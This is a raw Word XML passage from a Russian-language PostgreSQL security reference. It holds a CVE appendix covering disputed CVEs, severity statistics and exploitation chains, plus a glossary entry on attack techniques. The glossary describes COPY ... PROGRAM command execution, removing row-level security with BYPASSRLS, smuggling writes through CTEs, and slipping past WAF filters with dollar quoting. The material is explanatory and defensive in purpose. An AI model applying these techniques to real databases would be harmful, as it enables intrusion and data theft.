                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> вместо </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">\n!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → shell на машине pgAdmin</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pgAdmin — отдельный upgrade-cycle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7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(4.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disputed и context CVE (вне основного списка)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CVE-ID</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Год</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Статус</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Класс</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Краткая суть</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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Где обсуждается</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CVE-2019-9193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disputed (PG community)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RCE-feature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COPY ... FROM/TO PROGRAM — feature, не bug по позиции PG community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3.7.1 (R3)</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CVE-2018-1058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2018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fixed (структурно в PG 15)</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priv-esc</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array_to_string</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> trojan в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">public</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> schema через search_path</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2.4 / 3.13.4 (контекст для R16)</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CVE-2024-24213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vendor-disputed (Supabase)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misauth (disputed)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/pg_meta/default/query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> endpoint доступ; vendor считает это feature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4.9 (упоминание)</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CVE-2023-5870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fixed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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_signal_backend</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — DoS через signaling чужих backends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Не в R-якорях; упомянут в IBM bulletin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная статистика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Всего CVE с patched minor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17 (R6/R21 = тот же CVE, считаем за один).</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2022:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2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2023:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 CVE.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2024:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 CVE (включая 4 в batch 14.11.2024).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2025:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 CVE (включая R24 adjacent ecosystem).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2026:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на дату 2026-05-26 — не зафиксировано новых CVE; ожидается стандартный quarterly batch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity distribution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High (CVSS ≥ 7):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R6 (8.1), R7 (8.8), R12 (7.5), R13 (по advisory), R15 (8.8), R16 (8.0).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Medium (CVSS 4–7):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R8 (4.2), R9 (4.2), R11 (3.1), R17, R26, R27.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Low / informational:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R10, R14, R23.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-reference с разделом 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4.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — full chronology для 2022 (R15, R16).</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4.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chronology 2023 + полные карточки R13, R14.</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4.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chronology 2024 + полная карточка R10.</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4.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chronology 2025 + полные карточки R23, R24, R27.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4.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — master версионная таблица «CVE × patched minor».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4.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — цепочки эксплуатации (R6→R21, R8+R9, R16→R7).</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4.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — группировка informational CVE по audit-классам.</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4.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — managed-провайдеры и provider-specific quirks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Глоссарий PG-терминов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Алфавитный список PostgreSQL-специфичных терминов, встречающихся в разделах 1–5. Один-три абзаца на термин. Для context и motivation — ссылки на разделы документации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTOCOMMIT / TRANSACTION block</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL по умолчанию работает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">autocommit-режиме</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: каждая команда — отдельная транзакция, commit происходит автоматически. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BEGIN</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COMMIT</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ROLLBACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) определяют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">explicit transaction block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — несколько команд внутри одной транзакции. Внутри блока изменения видны только текущей сессии до commit. Для stacked queries (3.5) различие критично: вторая команда после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коммитится сразу в autocommit, в transaction-block — только при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">BYPASSRLS attribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атрибут роли, выключающий применение Row Level Security policies для всех таблиц при операциях этой роли. Game-over в multi-tenant context: один </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE app_role BYPASSRLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> снимает все RLS-policies. Не давать application-роли. См. 5.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY t FROM PROGRAM '...'</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COPY (SELECT ...) TO PROGRAM '...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняет произвольную shell-команду в OS-контексте процесса postgres. Требует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или SUPERUSER. Основной RCE-вектор в 3.7.1. Community-позиция: это feature, CVE-2019-9193 disputed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CTE (WITH ... AS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Table Expression — именованный subquery, объявленный через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgreSQL поддерживает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с PG 9.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH x AS (INSERT/UPDATE/DELETE ... RETURNING) SELECT FROM x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это позволяет smuggle write-ops через read-only-endpoint без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(3.10.1). Также recursive CTE (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) используется как time-based amplifier (3.10.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dollar-quoted strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Лексическая фича PostgreSQL: строковый literal в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или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с произвольным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) не требует escape одинарных кавычек или backslash. Используется в PL/pgSQL function bodies и для embedding кода. В attack context — обход WAF-фильтров на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(3.9.1, R5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Extended query protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wire-protocol режим PostgreSQL: команда отправляется отдельными сообщениями </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SQL-шаблон с placeholder-ами), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (значения параметров),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На стадии Parse сервер парсит ровно одну команду; multi-statement отвергается с ошибкой. Это серверное правило защищает от stacked queries (3.5) только если драйвер действительно использует этот протокол. Противоположное — simple query protocol.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
